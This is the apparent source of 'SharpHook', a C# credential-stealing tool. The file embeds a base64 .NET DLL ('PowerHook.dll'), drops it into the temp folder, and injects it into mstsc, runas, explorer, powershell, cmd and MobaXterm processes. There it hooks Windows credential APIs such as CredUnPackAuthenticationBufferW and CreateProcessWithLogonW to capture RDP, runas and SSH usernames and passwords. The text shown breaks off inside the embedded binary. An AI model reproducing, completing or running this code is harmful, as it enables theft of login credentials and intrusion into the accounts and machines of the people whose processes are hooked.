
using System;
using System.IO;
using System.Diagnostics;
using System.Collections.Generic;
using System.Threading;
using System.Linq;
using System.ComponentModel;
using System.Net;

namespace SharpHook
{
    class Program
    {
        static void Main(string[] args)
        {
            Int32 targetPID = 0;
           

            // Will contain the name of the IPC server channel
            string channelName = null;

            //List of processes to check for mstsc
            List<Process> processes = new List<Process>();

            //List of PIDs to check if injected processes have exited
            List<int> PIDs = new List<int>();

            //Keep track of processes where we've already injected
            List<int> injectedProcesses = new List<int>();

            // Create the IPC server using the RDPHook IPC.ServiceInterface class as a singleton
            Console.WriteLine("[*] Waiting ...");
            string TempFolder = Path.GetTempPath();
            string path = TempFolder + @"PowerHook.dll";
            bool fileExist = File.Exists(path);
            if (!fileExist)
            {
                GetDLLs("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sQNrAlgAAAAAAAMAxgGsAxEDYQAAAAAAAwDGAaIDKgNsAAAAAAADAIYYlArwAnAAAAAAAAMAxgGxA4YCcgAAAAAAAwDGAawDNwN0AAAAAAADAMYBogNFA3gAAAAAAAMAhhiUCvACegAAAAAAAwDGAbEDlAJ8AAAAAAADAMYBrANPA34AAAAAAAMAxgGiA1sDggAAAAAAAwCGGJQK8AKDAAAAAAADAMYBsQOvAoUAAAAAAAMAxgGsA2IDkAAAAAAAAwDGAaIDfQOdAJwnAAAAAIYYlAoGAKAAAAABAO0MAAACAPwDAAABAPYCAAABAO0MAAACAPwDAAABACoMAAACAKAEAAADAIEHAiAEAOMIAAABACoMAAACAKAEAAADAIEHAiAEAOMIAAABAJMLAAACAEMKAAADADYKAAAEADYEAAAFACYEAAAGAAgEAAAHAGYEAAAIAEMDAAAJADMDAAABAJMLAAACAEMKAAADADYKAAAEADYEAAAFACYEAAAGAAgEAAAHAGYEAAAIAEMDAAAJADMDAAABANkHACACAMwHAAABANkHACACAMwHAAABAFUNAAACAPQHAAABAFUNAAACAPQHAAABAEIEAAACAG0JAAADAE8DAAAEAGwLAAAFABYEAAAGAIAEAAAHAIULAAAIAHIMAAAJADgNAAAKAPUJAgALAHQJAAABAEIEAAACAG0JAAADAE8DAAAEAGwLAAAFABYEAAAGAIAEAAAHAIULAAAIAHIMAAAJADgNAAAKAPUJAgALAHQJAAABAGQAAAABACULAAABAJMDAAABAH8HAAABAAwIAQABAE8KAAABAIECAAABABcIAAABAIECAAABAJsDAAABABsMAAACACwDAAABACoMAAACAKAEAAADAIEHAiAEAOMIAAABACoMAAACAKAEAAADAIEHAiAEAOMIAAAFACkIAAAGABsMAiABAOMIAAACAFIMAAABABsMAAACACwDAAABAJMLAAACAEMKAAADADYKAAAEADYEAAAFACYEAAAGAAgEAAAHAGYEAAAIAEMDAAAJADMDAAABAJMLAAACAEMKAAADADYKAAAEADYEAAAFACYEAAAGAAgEAAAHAGYEAAAIAEMDAAAJADMDAAAKACkIAAALABsMAAABACYEAAACAGYEAAADADMDAAAEAFIMAAABABsMAAACACwDAAABANkHACACAMwHAAABANkHACACAMwHAAADACkIAAAEABsMAAABANkHAAACAFIMAAABABsMAAACACwDAAABAFUNAAACAPQHAAABAFUNAAACAPQHAAADACkIAAAEABsMAAABAFIMAAABABsMAAACACwDAAABAEIEAAACAG0JAAADAE8DAAAEAGwLAAAFABYEAAAGAIAEAAAHAIULAAAIAHIMAAAJADgNAAAKAPUJAgALAHQJAAABAEIEAAACAG0JAAADAE8DAAAEAGwLAAAFABYEAAAGAIAEAAAHAIULAAAIAHIMAAAJADgNAAAKAPUJAgALAHQJAAAMACkIAAANABsMAAABAPUJAgACAHQJAAADAFIMAgBFAAgAbQAJAJQKAQARAJQKBgAZAJQKCgApAJQKEAAxAJQKEAA5AJQKEABBAJQKEABJAJQKEABRAJQKEABZAJQKEABhAJQKFQBpAJQKEABxAJQKEAB5AJQKEADhAJQKBgDxAJQKGgAMAJQKBgCBAJQKBgCZAFkMJgCZAM4CTgApAdkLUgApAUsEWAAxAUkNXACpAOsLYgCpALwEaACpAF4BcgBBAWwBeACZAMsLfgBRAQYKggBZAX0KhwAMAB8NjgAMACIKBgBZAUAMlACpALQEfgAMAJ4MqQCxAPUMrQCxAOsHWAAxAaELsgAxAQEMtwAMACEHvgAxAQEM0wAxAQEMDQFhAYwEFAFhAYwEHwGBAOsHWAAxAfoLJAFhAQwKTgBhATEMTgBhAbgDLwFhAZkJNAEZAZQKBgBpAQEKPgFpAUkNQQFxAZQKBgB5AdwDUgGJAaUEWwGJAScNYwEJABQAgwEJABgAiAEJABwAjQEJACAAkgEJACQAlwEJACgAnAEJACwAoQEJADAApgEJADgAgwEJADwAiAEJAEAAjQEIAIwAkgEIAJAAqwEIAJQAsAEIAJgAtQEIAJwAugEIAKAAvwEIAKgAgwEIAKwAiAEuAAsAigMuABMAkwMuABsAsgMuACMAuwMuACsA0AMuADMA0AMuADsA0AMuAEMAuwMuAEsA1gMuAFMA0AMuAFsA0AMuAGMA7gMuAGsAGAQuAHMAJQRDAXsAgwFjAXsAgwHDAYMAcwTjAYMADwUDAoMAcwQjAoMAqwVDAoMAcwQTAMYBGwDGAUIAxAFDAMQBRwDEAZsAxgGjAMYBqQDGAecAxAHrAMQBMgCZAMQA2wDqAPsAGgEqAToBRwFsAQgJ7gggCTkJFQn7CCAAAAEFACwNAQBEAQkA+QECAAYBDQAbAgMARAMRAAgNBABCAxUALAAFAEQBGQADAgYAQAEtAHwDBgAEgAAAAQAAAAAAAAAAAAAAAAC9CAAABAAAAAAAAAAAAAAAcQGQAgAAAAACAAcAkxcAAAAAAAB6AccIAAAAAAQAAAAAAAAAAAAAAHEBVQkAAAAABAACAAUAAgAGAAIABwACAAgAAgAJAAIACgACAAsAAgAMAAIADQACAA4AAgAPAAIAEAACABEAAgASAAIAEwAIACcALQAAAABRdWV1ZWAxAEludDMyAHJlc2VydmVkMgByZXNlcnZlZDMAPE1vZHVsZT4AQ2hhclVwcGVyQnVmZkEAR0VORVJJQwBDUkVBVEVfU1VTUEVOREVEAERPTUFJTl9FWFRFTkRFRABjbGllbnRQSUQARE9NQUlOX1ZJU0lCTEVfUEFTU1dPUkQARE9NQUlOX1BBU1NXT1JEAENSRUFURV9ERUZBVUxUX0VSUk9SX01PREUATE9HT05fV0lUSF9QUk9GSUxFAENSRUFURV9ORVdfQ09OU09MRQBGSUxFVElNRQBMT0NBTF9NQUNISU5FAENSRURfVFlQRQBFTlRFUlBSSVNFAEdFTkVSSUNfQ0VSVElGSUNBVEUARE9NQUlOX0NFUlRJRklDQVRFAENSRURFTlRJQUxfQVRUUklCVVRFAFVOSUNPREVfU1RSSU5HAE5BVElWRUNSRURFTlRJQUwAZ2V0X1RocmVhZEFDTABTZXRFeGNsdXNpdmVBQ0wAQ1JFQVRFX1NFUEFSQVRFX1dPV19WRE0ATUFYSU1VTQBTRVNTSU9OAFBST0NFU1NfSU5GT1JNQVRJT04AQ1JFQVRFX05FV19QUk9DRVNTX0dST1VQAENSRUFURV9VTklDT0RFX0VOVklST05NRU5UAENSRURfUEVSU0lTVABDcmVkUmVhZFcAQ3JlYXRlUHJvY2Vzc1dpdGhMb2dvblcAQ3JlZFVuUGFja0F1dGhlbnRpY2F0aW9uQnVmZmVyVwBNQVhJTVVNX0VYAExPR09OX05FVENSRURFTlRJQUxTX09OTFkAdmFsdWVfXwBDbGVhblVwTWFuYWdlZERhdGEAQ2xlYW5VcE5hdGl2ZURhdGEAY2IAbXNjb3JsaWIAQ3JlZGVudGlhbEJsb2IAU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMAZHdUaHJlYWRJZABHZXRDdXJyZW50UHJvY2Vzc0lkAGR3UHJvY2Vzc0lkAGhUaHJlYWQAZGxsVG9Mb2FkAE1hcnNoYWxOYXRpdmVUb01hbmFnZWQASXNJbnN0YWxsZWQAcmVzZXJ2ZWQAbWV0aG9kAHBjY2hNYXhQYXNzd29yZABwc3pQYXNzd29yZABwYXNzd29yZABLZXl3b3JkAFNlcnZlckludGVyZmFjZQBHZXRJbnN0YW5jZQBDcmVkRnJlZQBSZXBvcnRNZXNzYWdlAG1lc3NhZ2UAY29va2llAEVuZEludm9rZQBCZWdpbkludm9rZQBzZXRfQ3Vyc29yVmlzaWJsZQBSdW50aW1lVHlwZUhhbmRsZQBHZXRUeXBlRnJvbUhhbmRsZQBDb25zb2xlAHRpdGxlAGNoYW5uZWxOYW1lAHBzekRvbWFpbk5hbWUAYXBwbGljYXRpb25OYW1lAHBjY2hNYXhVc2VyTmFtZQBwc3pVc2VyTmFtZQB1c2VyTmFtZQBnZXRfUHJvY2Vzc05hbWUAVGFyZ2V0TmFtZQBwY2NoTWF4RG9tYWluYW1lAERhdGVUaW1lAGNvbW1hbmRMaW5lAFdyaXRlTGluZQBWYWx1ZVR5cGUAdHlwZQBQdHJUb1N0cnVjdHVyZQBSZWxlYXNlAENyZWF0ZQBDaGFyVXBwZXJCdWZmQV9EZWxlZ2F0ZQBDcmVkUmVhZFdfRGVsZWdhdGUAQ3JlYXRlUHJvY2Vzc1dpdGhMb2dvbldfRGVsZWdhdGUAQ3JlZFVuUGFja0F1dGhlbnRpY2F0aW9uQnVmZmVyV19EZWxlZ2F0ZQBSdGxJbml0VW5pY29kZVN0cmluZ0V4X0RlbGVnYXRlAE11bHRpY2FzdERlbGVnYXRlAEd1aWRBdHRyaWJ1dGUARGVidWdnYWJsZUF0dHJpYnV0ZQBDb21WaXNpYmxlQXR0cmlidXRlAEFzc2VtYmx5VGl0bGVBdHRyaWJ1dGUAQXNzZW1ibHlUcmFkZW1hcmtBdHRyaWJ1dGUAVGFyZ2V0RnJhbWV3b3JrQXR0cmlidXRlAGZpbGxBdHRyaWJ1dGUAQXNzZW1ibHlGaWxlVmVyc2lvbkF0dHJpYnV0ZQBBc3NlbWJseUNvbmZpZ3VyYXRpb25BdHRyaWJ1dGUAQXNzZW1ibHlEZXNjcmlwdGlvbkF0dHJpYnV0ZQBVbm1hbmFnZWRGdW5jdGlvblBvaW50ZXJBdHRyaWJ1dGUARmxhZ3NBdHRyaWJ1dGUAQ29tcGlsYXRpb25SZWxheGF0aW9uc0F0dHJpYnV0ZQBBc3NlbWJseVByb2R1Y3RBdHRyaWJ1dGUAQXNzZW1ibHlDb3B5cmlnaHRBdHRyaWJ1dGUAQXNzZW1ibHlDb21wYW55QXR0cmlidXRlAFJ1bnRpbWVDb21wYXRpYmlsaXR5QXR0cmlidXRlAEJ5dGUAX21lc3NhZ2VRdWV1ZQBFbnF1ZXVlAFZhbHVlAE1hcnNoYWxNYW5hZ2VkVG9OYXRpdmUAR2V0TmF0aXZlRGF0YVNpemUAQ3JlZGVudGlhbEJsb2JTaXplAFZhbHVlU2l6ZQB4U2l6ZQB5U2l6ZQByZXNlcnZlZEZsYWcAUGluZwBTeXN0ZW0uVGhyZWFkaW5nAFJlbW90ZUhvb2tpbmcAU3lzdGVtLlJ1bnRpbWUuVmVyc2lvbmluZwBTb3VyY2VTdHJpbmcARGVzdGluYXRpb25TdHJpbmcAVG9TdHJpbmcAY2NoTGVuZ3RoAE1heGltdW1MZW5ndGgATWFuYWdlZE9iagBvYmoAQXN5bmNDYWxsYmFjawBjYWxsYmFjawBDaGFyVXBwZXJCdWZmQV9Ib29rAENyZWRSZWFkV19Ib29rAENyZWF0ZVByb2Nlc3NXaXRoTG9nb25XX0hvb2sAQ3JlZFVuUGFja0F1dGhlbnRpY2F0aW9uQnVmZmVyV19Ib29rAFJ0bEluaXRVbmljb2RlU3RyaW5nRXhfSG9vawBMb2NhbEhvb2sAUG93ZXJIb29rAEVhc3lIb29rAE1hcnNoYWwAQ3JlZGVudGlhbABjcmVkZW50aWFsAEFkdmFwaTMyLmRsbABhZHZhcGkzMi5kbGwAa2VybmVsMzIuZGxsAHVzZXIzMi5kbGwAQ3JlZHVpLmRsbABQb3dlckhvb2suZGxsAG50ZGxsLmRsbABIb29rQWNjZXNzQ29udHJvbABTeXN0ZW0ARW51bQBMYXN0V3JpdHRlbgBkb21haW4AcHJvY2Vzc0luZm9ybWF0aW9uAFN5c3RlbS5SZWZsZWN0aW9uAFNldEN1cnNvclBvc2l0aW9uAENhbGxpbmdDb252ZW50aW9uAE5vdEltcGxlbWVudGVkRXhjZXB0aW9uAFJlcG9ydEV4Y2VwdGlvbgBSdW4AU3RhcnR1cEluZm8Ac3RhcnR1cEluZm8AWmVybwBTbGVlcABnZXRfQ3Vyc29yVG9wAGRlc2t0b3AAQ2xlYXIAU3RyaW5nQnVpbGRlcgBjYkF1dGhCdWZmZXIAcEF1dGhCdWZmZXIAYnVmZmVyAElDdXN0b21NYXJzaGFsZXIAQ3JlZGVudGlhbEluTWFyc2hhbGVyAEVudGVyAF9zZXJ2ZXIAc3RkRXJyb3IALmN0b3IATW9uaXRvcgBJbnRQdHIAVGFyZ2V0QWxpYXMAU3lzdGVtLkRpYWdub3N0aWNzAFN5c3RlbS5SdW50aW1lLkludGVyb3BTZXJ2aWNlcwBTeXN0ZW0uUnVudGltZS5Db21waWxlclNlcnZpY2VzAERlYnVnZ2luZ01vZGVzAFJlcG9ydE1lc3NhZ2VzAG1lc3NhZ2VzAFN5c3RlbS5SdW50aW1lLkludGVyb3BTZXJ2aWNlcy5Db21UeXBlcwBBdHRyaWJ1dGVzAExvZ29uRmxhZ3MAbG9nb25GbGFncwBDcmVhdGlvbkZsYWdzAGNyZWF0aW9uRmxhZ3MAZHdGbGFncwBmbGFncwBDb250YWlucwB4Q291bnRDaGFycwB5Q291bnRDaGFycwBoUHJvY2VzcwBXYWtlVXBQcm9jZXNzAEdldEN1cnJlbnRQcm9jZXNzAEdldFByb2NBZGRyZXNzAENvbmNhdABGb3JtYXQATWFyc2hhbEJ5UmVmT2JqZWN0AG9iamVjdABDaGFyU2V0AHRhcmdldABnZXRfQ3Vyc29yTGVmdABFeGl0AElBc3luY1Jlc3VsdAByZXN1bHQASXBjQ29ubmVjdENsaWVudABDb21tZW50AGVudmlyb25tZW50AElFbnRyeVBvaW50AEluamVjdGlvbkVudHJ5UG9pbnQAZ2V0X0NvdW50AEF0dHJpYnV0ZUNvdW50AGNvdW50AFBlcnNpc3QAc3RkSW5wdXQAc3RkT3V0cHV0AFN5c3RlbS5UZXh0AElDb250ZXh0AGNvbnRleHQAZ2V0X05vdwBzaG93V2luZG93AFJ0bEluaXRVbmljb2RlU3RyaW5n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